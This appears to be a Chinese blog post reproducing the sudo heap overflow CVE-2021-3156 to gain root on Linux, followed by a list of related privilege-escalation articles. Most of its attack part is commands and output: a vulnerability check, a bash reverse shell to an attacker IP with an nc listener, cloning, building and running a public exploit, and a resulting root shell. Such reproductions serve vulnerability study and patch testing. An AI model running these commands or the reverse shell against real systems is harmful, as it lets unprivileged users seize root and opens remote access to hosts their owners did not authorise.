linux本地提权sudo(CVE-2021-3156)漏洞复现

最新推荐文章于 2024-05-13 14:14:45 发布
最新推荐文章于 2024-05-13 14:14:45 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: 漏洞复现 内网蠕动
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/114367711
版权

linux本地提权sudo(CVE-2021-3156)漏洞复现

影响范围

Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1

环境准备

这里使用的是kali2020.2
查看sudo版本

sudo --version

在这里插入图片描述
执行

sudoedit -s /

如果返回

root@kali:~# sudoedit -s /
sudoedit: /:不是常规文件  #sudoedit: /: not a regular file
root@kali:~#

则存在漏洞
返回

usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file

则不存在漏洞
添加用户

useradd test
passwd test
#设置用户密码
service ssh start#启动ssh

连接

ssh test@192.168.xx.xx

由于kali存在git,所以就直接使用git下载exp,否则需要使用webshell或者自行下载解压
或者直接在shell中反弹shell

bash -i >& /dev/tcp/192.168.x.x/996 0>&1 #端口号咋就这样了

接收shell

nc -lvvp 996

漏洞复现

cd /tmp
git clone https://github.com/blasty/CVE-2021-3156.git
make
chmod +x sudo-hax-me-a-sandwich
./sudo-hax-me-a-sandwich 1

操作过程

$ cd /tmp
$ pwd
/tmp
$ git clone https://github.com/blasty/CVE-2021-3156.git
正克隆到 'CVE-2021-3156'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (50/50), done.
remote: Compressing objects: 100% (35/35), done.
remote: Total 50 (delta 25), reused 38 (delta 15), pack-reused 0
接收对象中: 100% (50/50), 8.98 KiB | 836.00 KiB/s, 完成.
处理 delta 中: 100% (25/25), 完成.
$ cd CVE-2021-3156
$ pwd
/tmp/CVE-2021-3156
$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
$ ./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

  usage: ./sudo-hax-me-a-sandwich <target>

  available targets:
  ------------------------------------------------------------
    0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
    1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
    2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
  ------------------------------------------------------------

  manual mode:
    ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>

$ ./sudo-hax-me-a-sandwich 1

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),1001(test)
# ls
Makefile  README.md  brute.sh  hax.c  lib.c  libnss_X  sudo-hax-me-a-sandwich
# exit

参考文章

https://www.anquanke.com/post/id/231408

whojoe
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Linux sudo-cve-2021-3156
问题很多的小明
02-20 439
目前影响版本: 1.8.2- 1.8.31p2 1.9.0- 1.9.5 p1 kali sudo --version 查看版本 如果存在漏洞,执行sudoedit -s /则返回如下 下载exp: exp(点击下载) 在tmp解压后编译执行: tar -xvzf CVE-2021-3156_nss_poc_ubuntu.tar.gz cd CVE-2021-3156/ make &&./sudo-hax-me-a-sandwich 0 ...
Sudo 堆缓冲区溢出致本地漏洞(CVE-2021-3156)
qq_42947816的博客
05-29 2968
2021年1月26日,Sudo发布安全通告,修了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。
Linux--SUDO(CVE-2021-3156)&Polkit(CVE-2021-4034)
最新发布
金灰的博客
05-13 467
免责声明:本文仅做技术学习与交流...
Sudo 本地漏洞(CVE-2021-3156)
千年板蓝根
04-27 983
漏洞描述: 国外研究团队发sudo堆溢出漏洞CVE-2021-3156),漏洞隐藏十年之久,普通用户可以通过利用此漏洞,在默认配置的 sudo 主机上获取root限。漏洞细节已在互联网上公开,腾讯安全专家linux系统管理员尽快修Sudo是一个功能强大的实用程序,大多数基于Unix和Linux的操作系统都包含Sudo。 成功利用此漏洞,任何没有特的用户都可以在易受攻击的主机上获得root特。研究人员已经在Ubuntu 20.04(Sudo 1.8.31),Debian 10(Sudo
linuxCVE-2022-0847
liu_jia_liang的博客
03-14 6836
0x01 漏洞详情 3月7日,研究人员公开披露了Linux 内核中的一个漏洞CVE-2022-0847,也称为“Dirty Pipe”),允许非特用户注入和覆盖任意只读文件中的数据,导致升,并最终获得root限。该漏洞影响了 Linux Kernel 5.8 及更高版本,甚至影响了Android设备。 CVE-2022-0847漏洞类似于 2016 年修的 Dirty COW 漏洞 (CVE-2016-5195),但它更容易被利用,目前此漏洞的PoC/EXP已经发布。 0x0
CVE-2021-34866 Linux内核漏洞分析
Moyun_vackbot的博客
12-31 2977
2021年10月12日,日本安全厂商 Flatt security 披露了 Linux 内核漏洞CVE-2021-34866。11月5日,@HexRabbit 在 Github 上公布了此漏洞的利用方式,并写文分析,技术高超,行文简洁。但作为初次研究相关内容,笔者做了一些较基础的内容补充。 eBPF eBPF 是一种在访问内核服务和硬件的新技术。在这项技术诞生之前,如果需要在 Linux 内核执行定制的代码有两种方式,一是交代码到原生内核项目中,不用赘述其难度;二是使用内核模块,以扩展的方式添加代
Sudo缓冲区溢出漏洞(CVE-2021-3156)
04-06
linux sudo升级为1.9.5p2 及以上版本,sudo-1.9.10-1.el7.x86_64.rpm
CVE-2021-3156:有关CVE-2021-3156的注意事项
05-24
CVE-2021-3156 注意:这些说明是我自己的,并摘自我做过的信息流。 如果有任何问题,请通知我。 首先信任官方消息! 大家好, 几天前,在sudo中发了严重的基于堆的缓冲区溢出,任何本地用户都可以利用该缓冲区...
centos7-sudo-1.9.9.rpm包。修CVE-2021-3156,Sudo堆缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
CVE-2021-3156:CVE-2021-3156的PoC(sudo堆溢出)
03-06
CVE-2021-3156 CVE-2021-3156的PoC(sudo堆溢出)。 通过@ gf_256 aka cts进行利用。 感谢超级猜测者的r4j的帮助。 感谢Qualys的Braon Samedit供的。重要的示/ etc / passwd的修改时间必须比系统启动时间新,...
CVE-2021-3156:CVE-2021-3156的根外壳PoC
05-24
CVE-2021-3156 用于CVE-2021-3156的根外壳PoC(无暴力破解) 用于教育等 在Ubuntu 20.04上针对sudo 1.8.31测试 所有研究成果: Qualys研究小组在其上查看了详细信息。 您可以使用以下命令检查您的sudo版本是否存在...
CVE-2021-3493:Linux kernel特漏洞
Appleteachers的博客
04-22 1154
CVE-2021-3493:Linux kernel特漏洞 0x01 简介 linux kernel一般指Linux内核。Linux是一种开源电脑操作系统内核。它是一个用C语言写成,符合POSIX标准的类Unix操作系统。 0x02 漏洞概述 Linux内核中overlayfs文件系统中的Ubuntu特定问题,它未正确验证关于用户名称空间的文件系统功能的应用。由于Ubuntu附带了一个允许非特的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特。 0x03 影响版本 Ubun
LinuxEXP - CVE-2023-0386
潇湘信安的博客
06-22 204
漏洞编号:CVE-2023-0386;漏洞产品: linux kernel - overlay文件系统;影响范围: 5.11 - 5.19;使用条件: 可以取消共享或可以创建覆盖文件系统;利用效果: 本地
LinuxCVE-2022-0847分析
HBohan的博客
03-25 2338
漏洞利用原理: 通过pipe生成一个管道,然后使用write调用pip_write将管道填满flag为PIPE_BUF_FLAG_CAN_MERGE,然后用read将缓冲区全部释放,但是根据splice进行零拷贝时copy_page_to_iter_pipe没有将flag初始化,导致缓冲区仍然留存PIPE_BUF_FLAG_CAN_MERGE。进而在write上检测flag存在PIPE_BUF_FLAG_CAN_MERGE来达成越写入操作。 什么是零拷贝? 零拷贝是作用于两个文件间移动,正常文件拷贝流程一
Linux内核漏洞CVE-2023-32233测及POC脚本
qq_18209847的博客
05-17 1531
近日,研究人员发Linux内核的NetFilter框架中的新漏洞CVE-2023-32233)。问题的根源在于tfilter nf_tables是如何处理批处理请求的,经过身份验证的本地攻击者可通过发送特制的请求破坏Netfilter nf_tables的内部状态,从而获得更高限。目前,研究人员还开发了一个PoC。注意:一旦在易受攻击的系统上启动了PoC(概念验证),该系统可能会处于不稳定状态,并且内核内存可能被破坏。我们强烈建议在专用系统上测试PoC,以避免可能的数据损坏。
Linux kernel漏洞 CVE-2021-3493
千寻的博客
04-24 1183
文章目录漏洞名称漏洞编号漏洞描述影响版本步骤第一步 查看ubuntu版本第二步 下载3493.py第三步 编译脚本第四步 运行EXP成功Root摘抄poc 漏洞名称 Linux kernel漏洞 漏洞编号 CVE-2021-3493 漏洞描述 Ubuntu OverlayFS Local Privesc CVE-2021-3493 EXP在Github被公开,可以通过EXP在Ubuntu多个影响系统中升 ROOT限 OverlayFS漏洞允许Ubuntu下的本地用户获得root
Linux第一篇-Linux内核漏洞(以CVE-2015-1328为例)
Love&Share
11-18 4567
文章目录Linux内核漏洞拿shell附件 Linux内核漏洞 一般webshell拿到的限都是web容器限,如iis就是iss用户组限,apache就是apache 限,可以执行普通命令,但是如果要进行内网渗透就需要拿到系统限或者超级管理员linux首先需要创建交互shell 靶机环境Ubuntu15.04 保证主机与靶机之间可以连通 拿shell 利用已有的web漏洞,如文件上传,命令执行等上传一句话木马,得到交互式shell 假如web界面存在文件上传 测试.
sudo堆缓冲区溢出漏洞CVE-2021-3156)
Ryan的博客
01-13 2691
sudo堆缓冲区溢出漏洞CVE-2021-3156)
追洞小组 | Linux sudoCVE-2021-3156分析及exp的编写(上)
Ms08067安全实验室
03-01 1184
文章来源|MS08067 WEB攻防知识星球本文作者:不言(Ms08067实验室追洞小组成员)漏洞分析 认准追洞小组一、漏洞介绍Qualys 公司的研究团队在⼏乎所有主流 Unix ...
cve-2021-40444漏洞kali
04-06
以下是在Kali Linuxcve-2021-40444漏洞的步骤: 1. 安装 OpenOffice 打开终端并输入以下命令: ``` sudo apt update sudo apt install openoffice ``` 2. 创建恶意文档 使用文本编辑器创建一个名为“恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值